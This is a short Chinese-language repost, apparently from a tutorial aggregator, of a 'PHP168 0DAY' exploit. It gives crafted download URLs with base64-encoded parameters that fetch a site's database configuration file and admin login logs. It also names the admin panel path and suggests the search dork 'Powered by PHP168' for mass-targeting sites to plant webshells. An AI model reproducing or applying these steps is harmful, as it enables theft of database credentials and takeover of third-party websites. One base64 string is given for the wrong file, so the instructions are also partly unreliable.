php168站内统计,PHP168整站系统0DAY
先說明下是這個漏洞是在其他地方看到的,只是他沒有說的很清楚,好多菜菜都不明白,我就拿這發我的第一個貼吧!
這個漏洞其實就是利用了程序的編碼漏洞,下載配置和登陸日志文件,以下是利用方法。
下載 mysql_config.php 和 adminlogin_logs.php 兩個文件到本地。
http://dabei.org//job.php?job=download&url="aHR0cDovL2RhYmVpLm9yZy8vY2FjaGUvYWRtaW5sb2dpbl9sb2dzLnBocA=="
http://dabei.org//job.php?job=download&url="aHR0cDovL2RhYmVpLm9yZy8vY2FjaGUvYWRtaW5sb2dpbl9sb2dzLnBocA=="
程序后臺:
http://dabei.org/admin/index.php?iframe=1
Base64加密代碼:
http://dabei.org//cache/adminlogin_logs.php == "aHR0cDovL2RhYmVpLm9yZy8vY2FjaGUvYWRtaW5sb2dpbl9sb2dzLnBocA=="
(引號里面的是Base64加密后的)
http://dabei.org//php168/mysql_config.php == "aHR0cDovL2RhYmVpLm9yZy8vY2FjaGUvYWRtaW5sb2dpbl9sb2dzLnBocA=="
(引號里面的是Base64加密后的)
批量抓webshell:
google,baidu 輸入關鍵字:Powered by PHP168
From: http://www.hack58.net/Article/html/3/62/2008/20875.htm
總結
以上是生活随笔為你收集整理的php168站内统计,PHP168整站系统0DAY的全部內容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: ajax实现php验证码验证码,PHP验
- 下一篇: php 对象存储过程,从php中的存储过